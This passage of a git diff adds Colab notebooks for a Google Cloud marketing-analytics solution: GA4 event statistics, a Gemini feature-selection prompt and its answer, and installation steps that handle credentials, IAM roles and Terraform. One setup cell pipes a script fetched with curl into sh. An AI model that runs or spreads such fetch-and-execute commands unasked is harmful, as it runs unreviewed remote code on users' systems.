sample.cov(numeric_only=True).to_markdown()\n", + "\n", + "# If there were errors when analyzing, we leave the issues displayed\n", + "if no_type_error:\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + "\n", + "output = \"\"\"\n", + "### Exploratory data analysis completed. You can proceed to the next step.\n", + "\n", + "If you want to display the results, click on the button below:\n", + "\"\"\"\n", + "\n", + "display_analysis_button = widgets.Button(description=\"Display Analysis\")\n", + "\n", + "def display_analysis(button):\n", + " time.sleep(1)\n", + " clear_output(wait=True)\n", + " display(Markdown(analysis_output))\n", + " output = \"\"\"\n", + " ### Analysis displayed. You can proceed to the next step.\n", + " \"\"\"\n", + " display(Markdown(output))\n", + "\n", + "display_analysis_button.on_click(display_analysis)\n", + "\n", + "display(Markdown(output), display_analysis_button)" + ], + "metadata": { + "colab": { + "base_uri": "https://localhost:8080/", + "height": 1000, + "referenced_widgets": [ + "8984f440582d47f3906577d85cea75be", + "eeff31568fbf45128403f36d4bc4ef52", + "798f3dabcdbc4b5d8a158865c4d57ec6" + ] + }, + "id": "j4eKkLPaLKGq", + "outputId": "ade6fda0-54a8-4227-9e92-34b490f3de85", + "cellView": "form" + }, + "execution_count": 8, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "## Exploratory Data Analysis – Target: purchase_past_7_days\n### Target: purchase_past_7_days (Numerical) - This is the target variable\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0155\n* Standard Deviation: 0.34824111932354973\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 27.0\n* Correlation with Target: purchase_past_7_days: 1.0\n\n\n### view_cart_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0689\n* Standard Deviation: 0.5792981517619951\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 30.0\n* Correlation with Target: purchase_past_7_days: 0.62827199072288\n\n\n### select_promotion_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.2078\n* Standard Deviation: 0.7563573015690163\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 16.0\n* Correlation with Target: purchase_past_7_days: 0.03447300777908604\n\n\n### scroll_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.6606\n* Standard Deviation: 3.578280040578837\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 1.0\n* Maximum: 341.0\n* Correlation with Target: purchase_past_7_days: 0.13777167380447158\n\n\n### click_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0119\n* Standard Deviation: 0.1239351685059542\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 5.0\n* Correlation with Target: purchase_past_7_days: -0.001956899281874871\n\n\n### add_to_wishlist_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0107\n* Standard Deviation: 0.29050636721927364\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 19.0\n* Correlation with Target: purchase_past_7_days: 0.07448039795890475\n\n\n### add_to_cart_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.1416\n* Standard Deviation: 1.2781677555317719\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 86.0\n* Correlation with Target: purchase_past_7_days: 0.541054963037204\n\n\n### add_shipping_info_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0437\n* Standard Deviation: 0.5950005987990745\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 40.0\n* Correlation with Target: purchase_past_7_days: 0.9142771941406722\n\n\n### add_payment_info_past_7_days (Numerical)\n* Type: Float64\n* Count: 10000.0\n* Mean: 0.0472\n* Standard Deviation: 0.8092203925781755\n* Minimum: 0.0\n* 25th Percentile: 0.0\n* 50th Percentile (Median): 0.0\n* 75th Percentile: 0.0\n* Maximum: 57.0\n* Correlation with Target: purchase_past_7_days: 0.9552578954763322\n\n\n ## Correlation Matrix\n\n| | Target: purchase_past_7_days | view_cart_past_7_days | select_promotion_past_7_days | scroll_past_7_days | click_past_7_days | add_to_wishlist_past_7_days | add_to_cart_past_7_days | add_shipping_info_past_7_days | add_payment_info_past_7_days |\n|:------------------------------|-------------------------------:|------------------------:|-------------------------------:|---------------------:|--------------------:|------------------------------:|--------------------------:|--------------------------------:|-------------------------------:|\n| Target: purchase_past_7_days | 1 | 0.628272 | 0.034473 | 0.137772 | -0.0019569 | 0.0744804 | 0.541055 | 0.914277 | 0.955258 |\n| view_cart_past_7_days | 0.628272 | 1 | 0.149922 | 0.167022 | 0.0373333 | 0.100211 | 0.708627 | 0.800785 | 0.737409 |\n| select_promotion_past_7_days | 0.034473 | 0.149922 | 1 | 0.0860721 | -0.0135797 | 0.0704425 | 0.148321 | 0.0784891 | 0.0571763 |\n| scroll_past_7_days | 0.137772 | 0.167022 | 0.0860721 | 1 | 0.0118144 | 0.0433242 | 0.142168 | 0.15498 | 0.150974 |\n| click_past_7_days | -0.0019569 | 0.0373333 | -0.0135797 | 0.0118144 | 1 | -0.00353691 | 0.00703915 | 0.00379702 | 0.00237653 |\n| add_to_wishlist_past_7_days | 0.0744804 | 0.100211 | 0.0704425 | 0.0433242 | -0.00353691 | 1 | 0.142979 | 0.0765613 | 0.0735767 |\n| add_to_cart_past_7_days | 0.541055 | 0.708627 | 0.148321 | 0.142168 | 0.00703915 | 0.142979 | 1 | 0.58981 | 0.564985 |\n| add_shipping_info_past_7_days | 0.914277 | 0.800785 | 0.0784891 | 0.15498 | 0.00379702 | 0.0765613 | 0.58981 | 1 | 0.971957 |\n| add_payment_info_past_7_days | 0.955258 | 0.737409 | 0.0571763 | 0.150974 | 0.00237653 | 0.0735767 | 0.564985 | 0.971957 | 1 |\n \n ## Covariance Matrix\n\n| | Target: purchase_past_7_days | view_cart_past_7_days | select_promotion_past_7_days | scroll_past_7_days | click_past_7_days | add_to_wishlist_past_7_days | add_to_cart_past_7_days | add_shipping_info_past_7_days | add_payment_info_past_7_days |\n|:------------------------------|-------------------------------:|------------------------:|-------------------------------:|---------------------:|--------------------:|------------------------------:|--------------------------:|--------------------------------:|-------------------------------:|\n| Target: purchase_past_7_days | 0.121272 | 0.126745 | 0.00908001 | 0.171678 | -8.44584e-05 | 0.0075349 | 0.240829 | 0.189442 | 0.269195 |\n| view_cart_past_7_days | 0.126745 | 0.335586 | 0.0656891 | 0.346219 | 0.00268036 | 0.0168645 | 0.524696 | 0.276017 | 0.345682 |\n| select_promotion_past_7_days | 0.00908001 | 0.0656891 | 0.572076 | 0.232951 | -0.00127295 | 0.0154781 | 0.14339 | 0.0353227 | 0.0349953 |\n| scroll_past_7_days | 0.171678 | 0.346219 | 0.232951 | 12.8041 | 0.00523938 | 0.0450361 | 0.650224 | 0.329965 | 0.437163 |\n| click_past_7_days | -8.44584e-05 | 0.00268036 | -0.00127295 | 0.00523938 | 0.0153599 | -0.000127343 | 0.00111507 | 0.000279998 | 0.000238344 |\n| add_to_wishlist_past_7_days | 0.0075349 | 0.0168645 | 0.0154781 | 0.0450361 | -0.000127343 | 0.0843939 | 0.0530902 | 0.0132337 | 0.0172967 |\n| add_to_cart_past_7_days | 0.240829 | 0.524696 | 0.14339 | 0.650224 | 0.00111507 | 0.0530902 | 1.63371 | 0.448557 | 0.584375 |\n| add_shipping_info_past_7_days | 0.189442 | 0.276017 | 0.0353227 | 0.329965 | 0.000279998 | 0.0132337 | 0.448557 | 0.354026 | 0.467984 |\n| add_payment_info_past_7_days | 0.269195 | 0.345682 | 0.0349953 | 0.437163 | 0.000238344 | 0.0172967 | 0.584375 | 0.467984 | 0.654838 |" + }, + "metadata": {} + }, + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "\n ### Analysis displayed. You can proceed to the next step.\n " + }, + "metadata": {} + } + ] + }, + { + "cell_type": "code", + "source": [ + "# @title Step 6 - Getting recommendations from Gemini\n", + "\n", + "# @markdown Click the ( β–Ά ) button to generate a feature selection\n", + "# @markdown recommendation with Gemini, based on the exploratory data\n", + "# @markdown analysis performed at Step 5.\n", + "\n", + "# @markdown Gemini should also generate and highlight a short list of features\n", + "# @markdown that you can copy-paste in the `terraform.tfvars` file when\n", + "# @markdown installing the Marketing Analytics Jumpstart following the\n", + "# @markdown [installation guide](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/infrastructure/terraform/README.md#manual-installation-of-terraform-modules).\n", + "\n", + "\n", + "# @markdown ---\n", + "# @markdown #### Gemini Parameters\n", + "# @markdown The sliders below allow to customize the parameters used with the\n", + "# @markdown LLM model to generate the response:\n", + "\n", + "# @markdown 1. **Temperature** controls the randomness in token\n", + "# @markdown selection. A lower temperature is good when you expect a true or\n", + "# @markdown correct response. A temperature of 0 means the highest probability\n", + "# @markdown token is usually selected.\n", + "# @markdown A higher temperature can lead to diverse or unexpected results.\n", + "# @markdown Suggested value: `0.9`.\n", + "temperature = 0.9 # @param {\"type\":\"slider\",\"min\":0,\"max\":2,\"step\":0.1}\n", + "\n", + "# @markdown 2. **Top-P** changes how the model selects tokens for output.\n", + "# @markdown Tokens are selected from most probable to least until the sum of\n", + "# @markdown their probabilities equals the top-p value. For example, if tokens\n", + "# @markdown A, B, and C have a probability of .3, .2, and .1 and the top-p\n", + "# @markdown value is .5, then the model will select either A or B as the next\n", + "# @markdown token (using temperature). For the least variable results, set top-P\n", + "# @markdown to 0.\n", + "# @markdown Suggested value: `0.95`.\n", + "top_p = 0.95 # @param {\"type\":\"slider\",\"min\":0,\"max\":1,\"step\":0.01}\n", + "\n", + "# @markdown 3. **Top-K** specifies the number of candidate tokens when the model\n", + "# @markdown is selecting an output token. Use a lower value for less random\n", + "# @markdown responses and a higher value for more random responses. Suggested\n", + "# @markdown value: `1`.\n", + "top_k = 1 # @param {\"type\":\"slider\",\"min\":1,\"max\":40,\"step\":1}\n", + "\n", + "# @markdown 4. **Max Output Tokens** determines the maximum amount of text output\n", + "# @markdown from one prompt. A token is approximately four characters.\n", + "# @markdown Suggested value: `8192`.\n", + "max_output_tokens = 8192 # @param {\"type\":\"slider\",\"min\":1,\"max\":8192,\"step\":1}\n", + "\n", + "# @markdown ---\n", + "\n", + "# Prepare the prompt for Gemini\n", + "prompt = f\"\"\"\n", + "You are an expert data scientist and AI assistant helping to build a propensity model.\n", + "\n", + "The data comes from an export of GA4 data to BigQuery and we want to select the best events to use to create features to be used in the propensity model.\n", + "\n", + "Here is the output of the feature analysis. We calculated the correlation coefficient between each feature and the target {target}:\n", + "\n", + "{analysis_output}\n", + "\n", + "The features and target were engineered by counting the number of times each event occurred within a {rolling_window}-day rolling window and over a date range of {date_range_length} days. Both these parameters can be adjusted and the exploratory data analysis can be performed again.\n", + "If you think the data we have in the output of the feature analysis is not sufficient to make a recommendation, suggest to re-run the analysis proposing new values for number of days for the rolling windows and the date range.\n", + "\n", + "The event names can be deduced from the feature by removing the '_past_{rolling_window}_days' suffix.\n", + "\n", + "Based on this analysis, which events would you suggest to select for the propensity model?\n", + "\n", + "Start your answer with a title and divide it in sections using markdown.\n", + "\n", + "Provide your suggestions in a clear and concise format, explaining your reasoning. You can organize the selected events in a way that you think is most helpful. For example, you might group them by event type or by importance.\n", + "\n", + "List the suggested events to be used for features and the event to be used as target in the following format:\n", + "\n", + "* Target Event: `target_event`\n", + "* Analyzed Events: `event_1`, `event_2`, ..., `event_n`\n", + "* Suggested Events: `event_3`, `event_7`, `event_4`, `event_2`\n", + "\n", + "At the end, explicitly provide the following message to help the user copy-paste the suggested events including the list of suggested events:\n", + "\n", + "\n", + "### Copy the list below and paste into the `terraform.tfvars` file when installing the Marketing Analytics Jumpstart:\n", + "\n", + "```\n", + "[\"event_3\", \"event_7\", \"event_4\" , \"event_2\"]\n", + "```\n", + "\"\"\"\n", + "\n", + "model=GenerativeModel(\"gemini-1.5-pro\")\n", + "generation_config=GenerationConfig(\n", + " temperature=temperature,\n", + " top_p=top_p,\n", + " top_k=top_k,\n", + " max_output_tokens=max_output_tokens\n", + ")\n", + "\n", + "response = model.generate_content(prompt, generation_config=generation_config)\n", + "display(Markdown(response.text))" + ], + "metadata": { + "colab": { + "base_uri": "https://localhost:8080/", + "height": 708 + }, + "id": "g1vVmun1mpag", + "outputId": "58be510a-8c4c-43e9-ac56-81dd25676550", + "cellView": "form" + }, + "execution_count": 10, + "outputs": [ + { + "output_type": "display_data", + "data": { + "text/plain": [ + "" + ], + "text/markdown": "## Propensity Model Event Selection:\n\nThis analysis aims to recommend events from your GA4 data in BigQuery for building a propensity model to predict **purchase** likelihood. \n\n### Understanding the Results:\n\n* **Target Variable:** `purchase_past_7_days` signifies whether a user made a purchase in the past 7 days. Values range from 0 to 27, indicating multiple purchases are possible.\n* **Features:** Each other variable represents a user action (event) aggregated over a 7-day window. \n* **Correlation:** Measures the linear relationship between an event and the target. Values closer to 1 or -1 indicate stronger relationships.\n\n### Event Selection Rationale:\n\nWe'll prioritize events with the strongest positive correlation to `purchase_past_7_days`, as they are the most indicative of purchase intent. However, highly correlated features might carry redundant information, so we'll aim for a balance of predictability and model simplicity.\n\n1. **High Correlation Events:** \n * `add_payment_info`: **Strongest correlation (0.955)**, logically connected to purchase completion.\n * `add_shipping_info`: **Very high correlation (0.914),** another strong indicator of purchase intent.\n * **Note:** The extremely high correlation between these two might indicate they capture very similar user behavior. Consider whether one sufficiently represents the step before purchase or if both are necessary. \n\n2. **Moderate Correlation Events:**\n * `view_cart`: **Good correlation (0.628).** Viewing a cart suggests product consideration.\n * `add_to_cart`: **Solid correlation (0.541).** Adding to cart is a stronger purchase intent signal than just viewing.\n\n3. **Events for Potential Further Analysis (with adjustments):**\n * `scroll`: While the correlation is low (0.138), engagement metrics like scroll depth *might* become more predictive if we modify the aggregation window (e.g., 1-day instead of 7-day) or segment users differently. \n\n4. **Events to Exclude:**\n * `select_promotion`, `click`, `add_to_wishlist` show very weak or slightly negative correlations. They're unlikely to improve model accuracy.\n\n### Suggested Events:\n\n* **Target Event:** `purchase` \n* **Analyzed Events:** `view_cart`, `select_promotion`, `scroll`, `click`, `add_to_wishlist`, `add_to_cart`, `add_shipping_info`, `add_payment_info`\n* **Suggested Events:** `add_payment_info`, `add_shipping_info`, `add_to_cart`, `view_cart`\n\n### Copy the list below and paste into the `terraform.tfvars` file when installing the Marketing Analytics Jumpstart:\n\n```\n[\"add_payment_info\", \"add_shipping_info\", \"add_to_cart\" , \"view_cart\"]\n``` \n" + }, + "metadata": {} + } + ] + } + ] +} \ No newline at end of file diff --git a/notebooks/quick_installation.ipynb b/notebooks/quick_installation.ipynb new file mode 100644 index 00000000..56f14d1b --- /dev/null +++ b/notebooks/quick_installation.ipynb @@ -0,0 +1,563 @@ +{ + "nbformat": 4, + "nbformat_minor": 0, + "metadata": { + "colab": { + "provenance": [] + }, + "kernelspec": { + "name": "python3", + "display_name": "Python 3" + }, + "language_info": { + "name": "python" + } + }, + "cells": [ + { + "cell_type": "markdown", + "source": [ + "# Marketing Analytics Jumpstart Quick Installation\n", + "\n", + "\n", + "\n", + " \n", + " \n", + " \n", + " \n", + "
\n", + " \n", + " \"Google
Run in Colab\n", + "
\n", + "
\n", + " \n", + " \"Google
Run in Colab Enterprise\n", + "
\n", + "
\n", + " \n", + " \"GitHub
View on GitHub\n", + "
\n", + "
\n", + " \n", + " \"Vertex
Open in Vertex AI Workbench\n", + "
\n", + "
" + ], + "metadata": { + "id": "AKtB_GVpt2QJ" + } + }, + { + "cell_type": "markdown", + "source": [ + "Follow this Colab notebook to quick install the Marketing Analytics Jumpstart solution on a Google Cloud Project.\n", + "\n", + "> **Note:** You need access to the Google Analytics 4 Property, Google Ads Account and a Google Cloud project in which you will deploy Marketing Analytics Jumpstart, with the following permissions:\n", + ">> * Google Analytics Property Editor or Owner\n", + ">>\n", + ">> * Google Ads Reader\n", + ">>\n", + ">> * Project Owner for a Google Cloud Project\n", + ">>\n", + ">> * GitHub or GitLab account priviledges for repo creation and access token. [Details](https://cloud.google.com/dataform/docs/connect-repository)\n", + "\n", + "\n", + "\n", + "Total Installation time is around **35-40 minutes**." + ], + "metadata": { + "id": "mj-8n9jIyTn-" + } + }, + { + "cell_type": "markdown", + "source": [ + "### 1. Authenticate to Google Cloud Platform\n", + "\n", + "Click the ( β–Ά ) button to authenticate you to the Google Cloud Project.\n", + "\n", + "***Time: 30 seconds.***" + ], + "metadata": { + "id": "DDGHqJNhq5Oi" + } + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "from google.colab import auth\n", + "auth.authenticate_user()\n", + "\n", + "print('Authenticated')" + ], + "metadata": { + "id": "9TyPgnleJGGZ", + "cellView": "form", + "colab": { + "base_uri": "https://localhost:8080/" + }, + "outputId": "921e7c52-1913-402b-a880-8760861d0358" + }, + "execution_count": 1, + "outputs": [ + { + "output_type": "stream", + "name": "stdout", + "text": [ + "Authenticated\n" + ] + } + ] + }, + { + "cell_type": "markdown", + "source": [ + "### 2. Installation Configurations\n", + "\n", + "Fill-out the form, and Click the ( β–Ά ) button.\n", + "\n", + "***Time: 10 minutes.***" + ], + "metadata": { + "id": "mq1yqwr8qcx1" + } + }, + { + "cell_type": "code", + "source": [ + "# @markdown ---\n", + "# @markdown # Google Cloud Platform\n", + "# @markdown Copy the `Project ID` from the \"Project Info\" card in the console [Dashboard](https://console.cloud.google.com/home/dashboard).\n", + "GOOGLE_CLOUD_PROJECT_ID = \"your-project-id\" #@param {type:\"string\"}\n", + "GOOGLE_CLOUD_QUOTA_PROJECT = GOOGLE_CLOUD_PROJECT_ID\n", + "PROJECT_ID = GOOGLE_CLOUD_PROJECT_ID\n", + "MAJ_DEFAULT_PROJECT_ID = GOOGLE_CLOUD_PROJECT_ID\n", + "# @markdown ---\n", + "# @markdown # Google Analytics 4\n", + "# @markdown For a quick installation, copy the Google Analytics 4 property ID and stream ID. You will find it in your Google Analytics 4 console, under Admin settings.\n", + "GA4_PROPERTY_ID = \"1234567890\" #@param {type:\"string\"}\n", + "MAJ_GA4_PROPERTY_ID = GA4_PROPERTY_ID\n", + "GA4_STREAM_ID = \"1234567890\" #@param {type:\"string\"}\n", + "MAJ_GA4_STREAM_ID = GA4_STREAM_ID\n", + "# @markdown The website your Google Analytics 4 events are coming from.\n", + "WEBSITE_URL = \"https://shop.googlemerchandisestore.com\" #@param {type:\"string\", placeholder:\"Full web URL\"}\n", + "MAJ_WEBSITE_URL = WEBSITE_URL\n", + "# @markdown ---\n", + "# @markdown # Google Ads\n", + "# @markdown For a quick installation, copy the Google Ads Customer ID. You will find it in your Google Ads console. It must be in the following format: `\"CUSTOMERID\"` (without dashes).\n", + "GOOGLE_ADS_CUSTOMER_ID= \"1234567890\" #@param {type:\"string\", placeholder:\"GAds Account Number (e.g. 4717384083)\"}\n", + "MAJ_ADS_EXPORT_TABLE_SUFFIX = \"_\"+GOOGLE_ADS_CUSTOMER_ID\n", + "# @markdown ---\n", + "# @markdown # Github\n", + "# @markdown For a quick installation, use your email credentials that allows you to create a dataform repository connected to a remote Github repository, more info [here](https://cloud.google.com/dataform/docs/connect-repository).\n", + "GITHUB_REPO_OWNER_EMAIL = \"user@company.com\" #@param {type:\"string\", placeholder:\"user@company.com\"}\n", + "MAJ_DATAFORM_REPO_OWNER_EMAIL = GITHUB_REPO_OWNER_EMAIL\n", + "MAJ_DATAFORM_GITHUB_REPO_URL = \"https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart-dataform.git\"\n", + "# @markdown For a quick installation, reuse or create your [GitHub personal access token](https://cloud.google.com/dataform/docs/connect-repository#connect-https)\n", + "GITHUB_PERSONAL_TOKEN = \"your_github_personal_access_token\" #@param {type:\"string\"}\n", + "MAJ_DATAFORM_GITHUB_TOKEN = GITHUB_PERSONAL_TOKEN\n", + "# @markdown ---\n", + "\n", + "import os\n", + "os.environ['GOOGLE_CLOUD_PROJECT_ID'] = GOOGLE_CLOUD_PROJECT_ID\n", + "os.environ['GOOGLE_CLOUD_QUOTA_PROJECT'] = GOOGLE_CLOUD_QUOTA_PROJECT\n", + "os.environ['PROJECT_ID'] = PROJECT_ID\n", + "os.environ['MAJ_DEFAULT_PROJECT_ID'] = MAJ_DEFAULT_PROJECT_ID\n", + "!export SOURCE_ROOT=$(pwd)\n", + "!export TERRAFORM_RUN_DIR={SOURCE_ROOT}/infrastructure/terraform\n", + "REPO=\"marketing-analytics-jumpstart\"\n", + "!if [ ! -d \"/content/{REPO}\" ]; then git clone https://github.com/GoogleCloudPlatform/{REPO}.git ; fi\n", + "SOURCE_ROOT=\"/content/\"+REPO\n", + "%cd {SOURCE_ROOT}\n", + "!echo \"Enabling APIs\"\n", + "!gcloud config set project {GOOGLE_CLOUD_PROJECT_ID}\n", + "!. ~/.bashrc\n", + "!gcloud projects add-iam-policy-binding {GOOGLE_CLOUD_PROJECT_ID} --member user:{MAJ_DATAFORM_REPO_OWNER_EMAIL} --role=roles/bigquery.admin\n", + "!source ./scripts/common.sh && enable_all_apis > /dev/null\n", + "!echo \"APIs enabled\"\n", + "\n", + "from google.cloud import bigquery\n", + "# Construct a BigQuery client object.\n", + "client = bigquery.Client(project=GOOGLE_CLOUD_PROJECT_ID)\n", + "# Replace with your desired dataset ID suffix\n", + "dataset_id_suffix = MAJ_GA4_PROPERTY_ID\n", + "location = ''\n", + "dataset_id = ''\n", + "# Iterate through datasets and find the one with the matching suffix\n", + "for dataset in client.list_datasets():\n", + " dataset_id = dataset.dataset_id\n", + " if dataset_id.endswith(dataset_id_suffix):\n", + " dataset_ref = client.get_dataset(dataset.reference)\n", + " location = dataset_ref.location\n", + " print(f\"GA4 Dataset ID: {dataset_id}, Location: {location}\")\n", + " break\n", + "else:\n", + " print(f\"No dataset found with ID suffix: {dataset_id_suffix}\")\n", + "MAJ_MDS_DATA_LOCATION = location\n", + "MAJ_GA4_EXPORT_PROJECT_ID = GOOGLE_CLOUD_PROJECT_ID\n", + "MAJ_GA4_EXPORT_DATASET = dataset_id\n", + "\n", + "if MAJ_MDS_DATA_LOCATION == 'US':\n", + " MAJ_DEFAULT_REGION = 'us-central1'\n", + "elif MAJ_MDS_DATA_LOCATION == 'EU':\n", + " MAJ_DEFAULT_REGION = 'europe-west1'\n", + "else:\n", + " MAJ_DEFAULT_REGION = MAJ_MDS_DATA_LOCATION\n", + "MAJ_MDS_PROJECT_ID=MAJ_DEFAULT_PROJECT_ID\n", + "MAJ_MDS_DATAFORM_PROJECT_ID=MAJ_DEFAULT_PROJECT_ID\n", + "MAJ_FEATURE_STORE_PROJECT_ID=MAJ_DEFAULT_PROJECT_ID\n", + "MAJ_ACTIVATION_PROJECT_ID=MAJ_DEFAULT_PROJECT_ID\n", + "MAJ_ADS_EXPORT_PROJECT_ID = GOOGLE_CLOUD_PROJECT_ID\n", + "project_id=MAJ_ADS_EXPORT_PROJECT_ID\n", + "location = MAJ_MDS_DATA_LOCATION\n", + "table_suffix = MAJ_ADS_EXPORT_TABLE_SUFFIX\n", + "# Query to find datasets that contain tables with the specified suffix.\n", + "query = f\"\"\"\n", + " SELECT table_schema as dataset_id\n", + " FROM `{project_id}.region-{location}.INFORMATION_SCHEMA.TABLES`\n", + " WHERE table_name LIKE '%{table_suffix}'\n", + " GROUP BY table_schema\n", + "\"\"\"\n", + "# Run the query and fetch the results.\n", + "query_job = client.query(query)\n", + "results = query_job.result()\n", + "# Print the dataset IDs that match the criteria.\n", + "ads_dataset_id = ''\n", + "for row in results:\n", + " ads_dataset_id = row.dataset_id\n", + " print(f\"GAds dataset: {row.dataset_id}, Location: {location}\")\n", + "MAJ_ADS_EXPORT_DATASET = ads_dataset_id\n", + "\n", + "os.environ['MAJ_DEFAULT_REGION'] = MAJ_DEFAULT_REGION\n", + "os.environ['MAJ_MDS_PROJECT_ID'] = MAJ_MDS_PROJECT_ID\n", + "os.environ['MAJ_MDS_DATAFORM_PROJECT_ID'] = MAJ_MDS_DATAFORM_PROJECT_ID\n", + "os.environ['MAJ_FEATURE_STORE_PROJECT_ID'] = MAJ_FEATURE_STORE_PROJECT_ID\n", + "os.environ['MAJ_ACTIVATION_PROJECT_ID'] = MAJ_ACTIVATION_PROJECT_ID\n", + "os.environ['MAJ_MDS_DATA_LOCATION'] = MAJ_MDS_DATA_LOCATION\n", + "os.environ['MAJ_GA4_EXPORT_PROJECT_ID'] = MAJ_GA4_EXPORT_PROJECT_ID\n", + "os.environ['MAJ_GA4_EXPORT_DATASET'] = MAJ_GA4_EXPORT_DATASET\n", + "os.environ['MAJ_ADS_EXPORT_PROJECT_ID'] = MAJ_ADS_EXPORT_PROJECT_ID\n", + "os.environ['MAJ_ADS_EXPORT_DATASET'] = MAJ_ADS_EXPORT_DATASET\n", + "os.environ['MAJ_ADS_EXPORT_TABLE_SUFFIX'] = MAJ_ADS_EXPORT_TABLE_SUFFIX\n", + "os.environ['MAJ_WEBSITE_URL'] = MAJ_WEBSITE_URL\n", + "os.environ['MAJ_GA4_PROPERTY_ID'] = MAJ_GA4_PROPERTY_ID\n", + "os.environ['MAJ_GA4_STREAM_ID'] = MAJ_GA4_STREAM_ID\n", + "os.environ['MAJ_DATAFORM_REPO_OWNER_EMAIL'] = MAJ_DATAFORM_REPO_OWNER_EMAIL\n", + "os.environ['MAJ_DATAFORM_GITHUB_REPO_URL'] = MAJ_DATAFORM_GITHUB_REPO_URL\n", + "os.environ['MAJ_DATAFORM_GITHUB_TOKEN'] = MAJ_DATAFORM_GITHUB_TOKEN\n", + "\n", + "!sudo apt-get -qq -o=Dpkg::Use-Pty=0 install gettext\n", + "!envsubst < \"{SOURCE_ROOT}/infrastructure/cloudshell/terraform-template.tfvars\" > \"{SOURCE_ROOT}/infrastructure/terraform/terraform.tfvars\"\n", + "\n", + "!gcloud config set disable_prompts true\n", + "!gcloud config set project {PROJECT_ID}\n", + "\n", + "from IPython.display import clear_output\n", + "clear_output(wait=True)\n", + "print(\"SUCCESS\")" + ], + "metadata": { + "id": "dMcepKg8IQWj", + "cellView": "form", + "colab": { + "base_uri": "https://localhost:8080/" + }, + "outputId": "77ae4ebb-ffd2-462e-eb6f-d7235e62a4e0" + }, + "execution_count": 2, + "outputs": [ + { + "output_type": "stream", + "name": "stdout", + "text": [ + "SUCCESS\n" + ] + } + ] + }, + { + "cell_type": "markdown", + "source": [ + "### 3. Authenticate using application default credentials Google Cloud Platform\n", + "\n", + "Click the ( β–Ά ) button to create your Terraform application default credentials to the Google Cloud Project.\n", + "\n", + "*To complete this step, you will be prompted to copy/paste a password from another window into the prompt below.*\n", + "\n", + "**Note:** *Click on the hidden input box after the colon, as shown below.*\n", + "\n", + "![image (14).png]()\n", + "\n", + "***Time: 2 minute.***" + ], + "metadata": { + "id": "mOISt4ShqIbc" + } + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "!gcloud config set disable_prompts false\n", + "!gcloud auth application-default login --quiet --scopes=\"openid,https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/analytics,https://www.googleapis.com/auth/analytics.edit,https://www.googleapis.com/auth/analytics.provision,https://www.googleapis.com/auth/analytics.readonly,https://www.googleapis.com/auth/accounts.reauth\"\n", + "!gcloud auth application-default set-quota-project {PROJECT_ID}\n", + "!export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "\n", + "clear_output(wait=True)\n", + "print(\"SUCCESS\")" + ], + "metadata": { + "id": "3cAwp6CRLSVf", + "colab": { + "base_uri": "https://localhost:8080/" + }, + "outputId": "052b9063-ac72-4eb5-ba91-98662b5dbd0c", + "cellView": "form" + }, + "execution_count": 3, + "outputs": [ + { + "output_type": "stream", + "name": "stdout", + "text": [ + "SUCCESS\n" + ] + } + ] + }, + { + "cell_type": "markdown", + "source": [ + "### 4. Prepare environment for Installation\n", + "\n", + "Click the ( β–Ά ) button to prepare the environment for an end-to-end installation.\n", + "\n", + "***Time: 5 minutes.***" + ], + "metadata": { + "id": "WYG5sjFEqX2X" + } + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "# prompt: install packages\n", + "apt-get install python3.11\n", + "CLOUDSDK_PYTHON=python3.11\n", + "\n", + "#prompt: install uv\n", + "curl -LsSf https://astral.sh/uv/install.sh | sh\n", + "\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "uv --version\n", + "\n", + "git clone --depth=1 https://github.com/tfutils/tfenv.git ~/.tfenv\n", + "echo 'export PATH=\"~/.tfenv/bin:$PATH\"' >> ~/.bash_profile\n", + "echo 'export PATH=$PATH:~/.tfenv/bin' >> ~/.bashrc\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "\n", + "mkdir -p ~/.local/bin/\n", + ". ~/.profile\n", + "ln -s ~/.tfenv/bin/* ~/.local/bin\n", + "which tfenv\n", + "tfenv --version\n", + "\n", + "tfenv install 1.9.7\n", + "tfenv use 1.9.7\n", + "terraform --version\n", + "\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PROJECT_ID=$(gcloud config get project --format=json | tr -d '\"')\n", + "source ./scripts/generate-tf-backend.sh" + ], + "metadata": { + "id": 